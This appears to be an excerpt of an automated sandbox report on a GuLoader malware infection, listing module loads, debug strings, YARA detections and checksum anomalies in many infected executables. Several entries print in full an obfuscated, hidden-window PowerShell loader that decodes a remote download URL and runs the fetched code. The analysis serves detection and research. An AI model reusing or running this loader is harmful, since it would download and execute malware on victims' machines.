              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
              Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
              Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
              Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Detunes $reabandoned $Hydroquinol), (Repartitionens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Athogen = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($knoglemarvs)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Fodor, $false).DefineType($forlenet, $Snappe2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$AmeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIJump to behavior
              Source: AppVDllSurrogate.exe.9.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: jucheck.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x138baf
              Source: VSTOInstaller.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x23068
              Source: lyncicon.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xea647
              Source: chrome.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x2c9d6
              Source: ai.exe0.9.drStatic PE information: real checksum: 0x8a074 should be: 0xa200f
              Source: grv_icons.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x646fd
              Source: ai.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xc328b
              Source: MpDlpCmd.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x74f87
              Source: integrator.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Aut2exe.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x1997a9
              Source: Au3Info_x64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x49bdd
              Source: PerfBoost.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x6ed59
              Source: joticon.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xbd8e2
              Source: MpCmdRun.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x19b52e
              Source: aimgr.exe0.9.drStatic PE information: real checksum: 0x8a074 should be: 0x2e51b
              Source: SQLDumper.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x49b60
              Source: Au3Check.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x4ace1
              Source: AppSharingHookController64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x20765
              Source: Aut2exe_x64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x1c7652
              Source: Microsoft.Mashup.Container.Loader.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x218c6
              Source: AutoIt3Help.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x2942f
              Source: Uninstall.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x1d811
              Source: armsvc.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x38ee8
              Source: officeappguardwin32.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x1ea61e
              Source: jusched.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xc76e3
              Source: AppVDllSurrogate32.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: javaws.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x6c99c
              Source: OcPubMgr.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x182a45
              Source: msoev.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x268d3
              Source: accicons.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x4235e8
              Source: mpextms.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xee9bf
              Source: jaureg.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x95cbf
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xc392a
              Source: javaw.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x5043b
              Source: OfficeScrBroker.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xa8883
              Source: MsMpEng.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x39d03
              Source: aimgr.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x3b0de
              Source: SciTE.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x25609f
              Source: java.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x5013a
              Source: Au3Info.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x3d6d8
              Source: ConfigSecurityPolicy.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x8624f
              Source: MpCopyAccelerator.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x3e54a
              Source: OLicenseHeartbeat.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xb8fc4
              Source: AutoIt3_x64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x11706f
              Source: MpCmdRun.exe0.9.drStatic PE information: real checksum: 0x8a074 should be: 0x146cda
              Source: UcMapi.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x132706
              Source: Wordconv.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x1f925
              Source: AdobeARMHelper.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x64c50
              Source: Common.DBConnection.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x2153c
              Source: SDXHelper.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x38c81
              Source: upx.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x5c64b
              Source: GoogleCrashHandler.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x60b44
              Source: NisSrv.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x307019
